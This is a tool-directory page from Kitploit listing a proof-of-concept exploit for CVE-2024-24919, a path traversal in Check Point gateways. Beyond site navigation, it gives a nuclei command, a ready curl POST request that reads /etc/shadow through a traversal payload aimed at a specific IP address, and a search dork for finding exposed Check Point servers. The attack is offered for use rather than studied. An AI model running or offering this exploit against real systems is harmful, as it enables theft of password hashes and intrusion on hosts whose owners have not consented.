Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-24919 — Proof-of-concept exploit for CVE-2024-24919, a Check Point path traversal allowing arbitrary file read (e.g., /etc/shadow) via crafted HTTPS POST request. | Kitploit
Tools/GitHubGitHub/0xyumeko/cve-2024-24919
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHub0xyumeko/cve-2024-24919

CVE-2024-24919

Proof-of-concept exploit for CVE-2024-24919, a Check Point path traversal allowing arbitrary file read (e.g., /etc/shadow) via crafted HTTPS POST request.

View Repository
112 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Check point:CVE-2024-24919

2024-05-31_08-14

run CVE

root@kitploit:~
nuclei -list chick.txt -t CVE-2024-24919.yaml

Replace with the target IP address, and this command will attempt to access the /etc/shadow file, which contains password hashes.

root@kitploit:~
curl --path-as-is -i -s -k -X POST \ -H 'Host: 117.102.198.7 ' \ -H 'Content-Length: 39' \ -H 'Connection: keep-alive' \ --data-binary 'aCSHELL/../../../../../../../etc/shadow' \ 'https://117.102.198.7/clients/MyCRL'

cve

Dork: "Server: Check Point SVN" "X-UA-Compatible: IE=EmulateIE7"

Download Tool